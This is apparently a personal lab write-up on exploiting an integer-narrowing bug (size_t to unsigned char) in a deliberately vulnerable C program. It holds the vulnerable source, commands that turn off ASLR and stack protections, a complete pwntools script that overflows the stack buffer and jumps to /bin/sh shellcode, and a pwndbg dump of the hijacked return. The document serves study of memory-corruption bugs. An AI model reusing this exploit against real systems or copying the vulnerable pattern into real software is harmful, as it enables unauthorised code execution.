Buffer overflow triggered by integer overflow ☕……

[TOC]

Integer_Overflow

I have learned about the size_t ==> unsigned char integer overflow 🙃…

Example Source Code

Instructions to compile (the first line turns off ASLR; the gcc flags turn off the stack protector and make the stack executable):

# Disables ASLR system-wide (requires root) so stack addresses stay the same between runs.
echo 0 > /proc/sys/kernel/randomize_va_space
# -g: debug symbols; -fno-stack-protector: no stack canary, so an overwritten saved rbp /
# return address is not detected; -z execstack: stack pages are executable (NX off),
# so code placed on the stack can run.
gcc -g -fno-stack-protector -z execstack size_over.c -o size_over

size_over.c

#include<stdio.h>
#include<string.h>
#include <unistd.h>
// Deliberately vulnerable length check (the subject of this write-up).
// msg_size arrives as an int but is compared only after being narrowed to an
// unsigned char, and the copy that follows is bounded by neither value.
void validate_msg(char *msg,int msg_size){
    char msg_buf[11];    
    // Narrowing to unsigned char keeps only the low 8 bits (value mod 256):
    // e.g. 260 becomes 4, so a large msg_size can still pass the 4..8 check.
    unsigned char msg_len = msg_size;
      printf("\n[+]msg_len:%d \n",msg_len);
    // The range check is made on the truncated msg_len, not on msg_size.
    if(msg_len >= 4 && msg_len <= 8) {
        printf("good!\n");
        // strcpy ignores both msg_len and sizeof msg_buf; it copies until the
        // first NUL byte in msg, so anything longer than 10 bytes runs past
        // msg_buf into the saved rbp and return address (stack buffer overflow).
        // Mitigation: check the untruncated size against sizeof msg_buf and
        // copy with an explicit length (memcpy/strncpy plus a NUL terminator).
        strcpy(msg_buf, msg);
    } else {
        printf("bad!\n");
    }
} 
int main() {
    size_t msg_size;
    printf("Input the size:");
    // "%d" expects an int*, but msg_size is a size_t: a format/type mismatch
    // (undefined behaviour; "%zu" is the matching conversion). In practice
    // only the low 4 bytes are written and the rest stay uninitialised.
    scanf("%d",&msg_size);
    unsigned char payload[1000];
    // The user-supplied msg_size goes straight to read() with no check against
    // sizeof payload, and the return value (bytes actually read) is ignored,
    // so payload is neither bounded nor NUL-terminated at this point.
    read(0,payload,msg_size);
    //printf("%s\n",payload);
    // size_t -> int and unsigned char* -> char* conversions happen here; the
    // narrowing continues inside validate_msg (int -> unsigned char).
    validate_msg(payload,msg_size);
}

Exploit script

Here is my exploit script…

Maybe I should spend some time learning the underlying libc…

From this example, we can learn more about how an overflow can be used to execute shellcode on the stack, and about the influence of \x00 bytes……

Normally, executing shellcode on the stack requires NX to be disabled… The program is hijacked into the stack either by using a `jmp esp` gadget, or by controlling EIP while the stack address is known…

#!/usr/bin/python
#coding:utf-8

# pwntools script for size_over.c. Written for Python 2: str and the bytes
# returned by p64()/asm() are concatenated below, which raises TypeError on
# Python 3.
from pwn import *
# The target is 64-bit Linux; the shellcode is assembled for that arch.
context(arch = 'amd64', os = 'linux')
context.log_level = "debug"

# Assemble pwntools' stock /bin/sh shellcode.
shellcode = shellcraft.sh()
shellcode = asm(shellcode)

# Different environments have different addresses; these are the values
# observed on the author's machine. They are only stable because ASLR was
# turned off (randomize_va_space = 0) -- with ASLR on they change every run.
rbp = 0x7fffffffdcb0
shellcode_addr = 0x7fffffffdcb0 + 0x30
# Layout: 12 bytes fill msg_buf[11] plus alignment, 8 bytes overwrite the saved
# rbp (the register dump shows RBP == 'bbbbbbbb'), then the new return address
# (8), a NOP sled and the shellcode. Note that strcpy stops at the first NUL,
# which sits inside p64(shellcode_addr), so only the padding and the address
# are copied into msg_buf; presumably the sled/shellcode actually executed is
# the copy read() already placed in main's payload buffer -- the stack dump in
# this write-up is consistent with that, but confirm under gdb.
payload = ""
payload += 12 * "a"
payload += 8 * "b"
payload += p64(shellcode_addr)
payload += 0x20*"\x90"
payload += shellcode
# Total length 260 = 0x104: narrowed to unsigned char that is 4, which
# satisfies the 4..8 check in validate_msg.
payload  = payload.ljust(260,"\x90")
p = process('./size_over')
#gdb.attach(p)
#pause()
#p.recvuntil(":")
# The size consumed by scanf("%d") in main; it is also the length of the read()
# that follows.
p.send('260\n')
p.send(payload)
p.interactive()

Running up to the `ret` into shellcode_addr:

pwndbg> ni
0x00005555555551dc in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffdca4 ◂— 0x6161616161616161 ('aaaaaaaa')
 RBX  0x0
 RCX  0xffffdce062626262
 RDX  0x7fffff
 RDI  0x7fffffffdcb4 ◂— 0xffffdce062626262
 RSI  0x7fffffffdcd0 ◂— 0xffffdce062626262
 R8   0x7ffff7f9e500 ◂— add    ch, ah /* 0x7ffff7f9e500 */
 R9   0x7fffffffdb67 ◂— 0xa87c57a943ef0034 /* '4' */
 R10  0xfffffffffffff4a8
 R11  0x7ffff7f58a60 ◂— add    byte ptr [rdx], cl
 R12  0x555555555090 ◂— xor    ebp, ebp
 R13  0x7fffffffe190 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x6262626262626262 ('bbbbbbbb')
 RSP  0x7fffffffdcb8 —▸ 0x7fffffffdce0 ◂— 0x9090909090909090
 RIP  0x5555555551dc ◂— ret    
───────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────
   0x5555555551ce    lea    rdi, qword ptr [rip + 0xe46]
   0x5555555551d5    call   0x555555555040

   0x5555555551da    nop    
   0x5555555551db    leave  
 ► 0x5555555551dc    ret    <0x7fffffffdce0>

   0x5555555551dd    push   rbp
   0x5555555551de    mov    rbp, rsp
   0x5555555551e1    sub    rsp, 0x3f0
   0x5555555551e8    lea    rdi, qword ptr [rip + 0xe31]
   0x5555555551ef    mov    eax, 0
   0x5555555551f4    call   0x555555555050
────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffdcb8 —▸ 0x7fffffffdce0 ◂— 0x9090909090909090
01:0008│      0x7fffffffdcc0 ◂— 0x6161616161616161 ('aaaaaaaa')
02:0010│      0x7fffffffdcc8 ◂— 0x6262626261616161 ('aaaabbbb')
03:0018│ rsi  0x7fffffffdcd0 ◂— 0xffffdce062626262
04:0020│      0x7fffffffdcd8 ◂— 0x9090909000007fff
05:0028│      0x7fffffffdce0 ◂— 0x9090909090909090
... ↓
──────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────
 ► f 0     5555555551dc
   f 1     7fffffffdce0
   f 2 6161616161616161
   f 3 6262626261616161
   f 4 ffffdce062626262
   f 5 9090909000007fff
   f 6 9090909090909090
   f 7 9090909090909090
   f 8 9090909090909090
   f 9 b848686a90909090
   f 10 732f2f2f6e69622f
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

Exploit running status: